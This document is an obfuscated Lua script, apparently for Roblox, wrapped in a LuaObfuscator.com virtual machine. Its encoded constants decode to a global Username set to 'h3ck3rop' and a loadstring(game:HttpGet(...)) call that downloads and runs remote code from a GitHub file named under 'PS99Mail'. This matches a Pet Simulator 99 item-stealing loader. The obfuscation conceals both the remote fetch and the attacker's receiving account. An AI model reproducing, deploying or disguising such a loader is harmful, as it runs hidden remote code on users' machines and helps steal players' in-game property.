--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v68,v19);v19=nil;v79=1;end end else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-1)) + ((1 + 1) -1))) ;return v69-(v69%(620 -(555 + 17 + 47))) ;else local v70=2^(v32-(932 -(857 + 74))) ;return (((v31%(v70 + v70))>=v70) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37=1065 -(68 + 997) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (16778486 -(226 + (2490 -1446)))) + (v40 * (285370 -219834)) + (v39 * (373 -(32 + 85))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=958 -(892 + 65) ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 -0 ,20) * ((352 -(87 + 263))^((37 + 175) -((118 -51) + 113 + 0)))) + v42 ;local v46=v20(v43,(807 -(368 + 423)) + 5 ,97 -66 );local v47=((v20(v43,78 -46 )==(1 + 0)) and  -(3 -2)) or 1 ;if (v46==(952 -(802 + 150))) then if (v45==(0 -0)) then return v47 * ((0 -0) -0) ;else v46=1 + 0 ;v44=0;end elseif (v46==(3044 -(915 + 82))) then return ((v45==(0 -0)) and (v47 * ((1 + (18 -(10 + 8)))/(0 -(0 -0))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(1239 -((2337 -1268) + 118))))) ;end local function v25(v48)local v49;if  not v48 then local v71=442 -(416 + 26) ;while true do if (v71==(0 -0)) then v48=v23();if (v48==((438 -(145 + 293)) + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(2 + 0)) then for v81=242 -(187 + 54) ,v56 do local v82=780 -(162 + 618) ;local v83;local v84;while true do if (v82==0) then local v110=0 + 0 ;while true do if (v110~=(0 + 0)) then else v83=v21();v84=nil;v110=1 -0 ;end if (v110~=(1 -0)) then else v82=1 + 0 ;break;end end end if (v82==(1637 -(1373 + 263))) then if (v83==1) then v84=v21()~=0 ;elseif (v83==(1002 -(451 + 549))) then v84=v24();elseif (v83==(1 + 2)) then v84=v25();end v57[v81]=v84;break;end end end v55[3]=v21();for v85=1 -0 ,v23() do local v86=0 -0 ;local v87;local v88;local v89;while true do if (v86==1) then v89=nil;while true do if (v87==0) then local v116=0;while true do if (v116==0) then v88=0;v89=nil;v116=1385 -(746 + 638) ;end if (v116==(1 + 0)) then v87=1;break;end end end if ((1 -0)==v87) then while true do if (v88~=(341 -(218 + 123))) then else v89=v21();if (v20(v89,1582 -(1535 + 46) ,1 + 0 )~=(0 + 0)) then else local v137=560 -(306 + 254) ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if (v137==(0 + 0)) then v138=0 -0 ;v139=nil;v137=1468 -(899 + 568) ;end if (1~=v137) then else v140=nil;v141=nil;v137=2 + 0 ;end if (v137==(7 -4)) then while true do if (v138~=(605 -(268 + 335))) then else v143=nil;while true do if (v139~=2) then else while true do if (v140==(293 -(60 + 230))) then if (v20(v142,3,3)~=(573 -(426 + 146))) then else v143[1 + 3 ]=v57[v143[4]];end v52[v85]=v143;break;end if (v140==1) then local v188=0;local v189;while true do if (v188~=0) then else v189=1456 -(282 + 1174) ;while true do if (v189==1) then v140=813 -(569 + 242) ;break;end if (v189==0) then v143={v22(),v22(),nil,nil};if (v141==(1251 -(721 + 530))) then local v199=0;local v200;local v201;local v202;while true do if (1==v199) then v202=nil;while true do if (v200==(1272 -(945 + 326))) then while true do if (v201==0) then v202=0 -0 ;while true do if (v202==0) then v143[3]=v22();v143[4 + 0 ]=v22();break;end end break;end end break;end if (v200==(700 -(271 + 429))) then local v207=0 + 0 ;while true do if (v207~=(1501 -(1408 + 92))) then else v200=1;break;end if (v207~=0) then else v201=1086 -(461 + 625) ;v202=nil;v207=1289 -(993 + 295) ;end end end end break;end if (v199==0) then v200=0 + 0 ;v201=nil;v199=1;end end elseif (v141==1) then v143[1174 -(418 + 753) ]=v23();elseif (v141==(1 + 1)) then v143[1 + 2 ]=v23() -((1 + 1)^(5 + 11)) ;elseif (v141~=3) then else local v208=0;local v209;local v210;local v211;while true do if (v208~=(530 -(406 + 123))) then else v211=nil;while true do if (1==v209) then while true do if (v210==(1769 -(1749 + 20))) then v211=0;while true do if (v211==0) then v143[1 + 2 ]=v23() -(2^(1338 -(1249 + 73))) ;v143[4]=v22();break;end end break;end end break;end if (v209==0) then local v215=0;while true do if (v215==(1 + 0)) then v209=1146 -(466 + 679) ;break;end if (v215==0) then v210=0 -0 ;v211=nil;v215=2 -1 ;end end end end break;end if (v208==0) then v209=1900 -(106 + 1794) ;v210=nil;v208=1;end end end v189=1;end end break;end end end if (v140==2) then local v190=0;local v191;local v192;while true do if ((1 + 0)~=v190) then else while true do if (v191==0) then v192=0;while true do if (0~=v192) then else local v203=0;local v204;while true do if (v203==(0 + 0)) then v204=0;while true do if (0==v204) then local v212=0;while true do if (v212==(0 -0)) then if (v20(v142,1,2 -1 )~=(115 -(4 + 110))) then else v143[2]=v57[v143[586 -(57 + 527) ]];end if (v20(v142,1429 -(41 + 1386) ,2)==1) then v143[106 -(17 + 86) ]=v57[v143[3 + 0 ]];end v212=1 -0 ;end if (v212==(2 -1)) then v204=1;break;end end end if (v204~=1) then else v192=167 -(122 + 44) ;break;end end break;end end end if (v192==(1 -0)) then v140=9 -6 ;break;end end break;end end break;end if ((0 + 0)~=v190) then else v191=0 + 0 ;v192=nil;v190=1;end end end if (v140==(0 -0)) then local v193=65 -(30 + 35) ;local v194;while true do if (v193==0) then v194=0 + 0 ;while true do if ((1258 -(1043 + 214))~=v194) then else v140=3 -2 ;break;end if (v194~=(1212 -(323 + 889))) then else v141=v20(v89,5 -3 ,583 -(361 + 219) );v142=v20(v89,324 -(53 + 267) ,6);v194=1;end end break;end end end end break;end if (v139==0) then local v184=0 + 0 ;local v185;while true do if (v184==(413 -(15 + 398))) then v185=982 -(18 + 964) ;while true do if (v185==1) then v139=1;break;end if (v185==0) then local v198=0 -0 ;while true do if (v198==0) then v140=0;v141=nil;v198=1;end if (1~=v198) then else v185=1 + 0 ;break;end end end end break;end end end if (v139~=(1 + 0)) then else local v186=850 -(20 + 830) ;while true do if ((1 + 0)==v186) then v139=128 -(116 + 10) ;break;end if (v186==0) then local v195=0 + 0 ;while true do if (v195~=0) then else v142=nil;v143=nil;v195=739 -(542 + 196) ;end if (v195~=(1 -0)) then else v186=1;break;end end end end end end break;end if (v138~=1) then else v141=nil;v142=nil;v138=2;end if ((0 + 0)==v138) then local v183=0 + 0 ;while true do if (v183==0) then v139=0;v140=nil;v183=1;end if (v183~=1) then else v138=1;break;end end end end break;end if ((1 + 1)==v137) then v142=nil;v143=nil;v137=3;end end end break;end end break;end end break;end if (v86==(0 -0)) then v87=0;v88=nil;v86=2 -1 ;end end end v51=1554 -(1126 + 425) ;end if (v51==3) then for v90=406 -(118 + 287) ,v23() do v53[v90-1 ]=v28();end return v55;end if (v51~=1) then else local v73=0;while true do if (v73~=0) then else local v109=0;while true do if (v109==(3 -2)) then v73=1122 -(118 + 1003) ;break;end if (v109==0) then v55={v52,v53,nil,v54};v56=v23();v109=378 -(142 + 235) ;end end end if (v73==(4 -3)) then v57={};v51=1 + 1 ;break;end end end if (v51==0) then local v74=977 -(553 + 424) ;local v75;while true do if (0==v74) then v75=0;while true do if (v75==(0 -0)) then v52={};v53={};v75=1;end if (v75==1) then v54={};v51=1;break;end end break;end end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v92=v62;local v93=v63;local v94=v64;local v95=v27;local v96=1;local v97= -1;local v98={};local v99={...};local v100=v12("#",...) -1 ;local v101={};local v102={};for v106=0,v100 do if (v106>=v94) then v98[v106-v94 ]=v99[v106 + 1 ];else v102[v106]=v99[v106 + 1 ];end end local v103=(v100-v94) + 1 ;local v104;local v105;while true do v104=v92[v96];v105=v104[1];if (v105<=10) then if (v105<=4) then if (v105<=1) then if (v105==0) then for v135=v104[2],v104[3] do v102[v135]=nil;end else v96=v104[3];end elseif (v105<=2) then if ((v104[3]=="_ENV") or (v104[3]=="getfenv")) then v102[v104[2]]=v60;else v102[v104[2]]=v60[v104[3]];end elseif (v105==3) then if (v102[v104[2]]==v104[4]) then v96=v96 + 1 ;else v96=v104[3];end else v60[v104[3]]=v102[v104[2]];end elseif (v105<=7) then if (v105<=5) then if ((v104[3]=="_ENV") or (v104[3]=="getfenv")) then v102[v104[2]]=v60;else v102[v104[2]]=v60[v104[3]];end elseif (v105>6) then v102[v104[2]]=v104[3];elseif (v102[v104[2]]==v104[4]) then v96=v96 + 1 ;else v96=v104[3];end elseif (v105<=8) then local v118=0;local v119;local v120;while true do if (v118==0) then v119=v104[2];v120=v102[v104[3]];v118=1;end if (1==v118) then v102[v119 + 1 ]=v120;v102[v119]=v120[v104[4]];break;end end elseif (v105==9) then v102[v104[2]]();else v96=v104[3];end elseif (v105<=15) then if (v105<=12) then if (v105>11) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==0) then v122=v104[2];v123,v124=v95(v102[v122](v13(v102,v122 + 1 ,v104[3])));v121=1;end if (v121==1) then v97=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==2) then for v178=v122,v97 do v125=v125 + 1 ;v102[v178]=v123[v125];end break;end end else local v126=0;local v127;while true do if (v126==0) then v127=v104[2];v102[v127]=v102[v127](v13(v102,v127 + 1 ,v97));break;end end end elseif (v105<=13) then v102[v104[2]]=v104[3];elseif (v105>14) then v102[v104[2]]();else local v155=v104[2];local v156,v157=v95(v102[v155](v13(v102,v155 + 1 ,v104[3])));v97=(v157 + v155) -1 ;local v158=0;for v171=v155,v97 do v158=v158 + 1 ;v102[v171]=v156[v158];end end elseif (v105<=18) then if (v105<=16) then do return;end elseif (v105>17) then local v159=0;local v160;while true do if (v159==0) then v160=v104[2];v102[v160]=v102[v160](v13(v102,v160 + 1 ,v97));break;end end else v60[v104[3]]=v102[v104[2]];end elseif (v105<=19) then local v130=v104[2];local v131=v102[v104[3]];v102[v130 + 1 ]=v131;v102[v130]=v131[v104[4]];elseif (v105>20) then do return;end else for v174=v104[2],v104[3] do v102[v174]=nil;end end v96=v96 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503083O006833636B33726F70030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120D3O00016O000100013O0026033O00020001000100040A3O0002000100120D000100013O002603000100050001000100040A3O0005000100120D000200033O001211000200023O001205000200043O001205000300053O00201300030003000600120D000500074O000C000300054O001200023O00022O000900020001000100040A3O0014000100040A3O0005000100040A3O0014000100040A3O000200012O00103O00017O00",v9(),...);
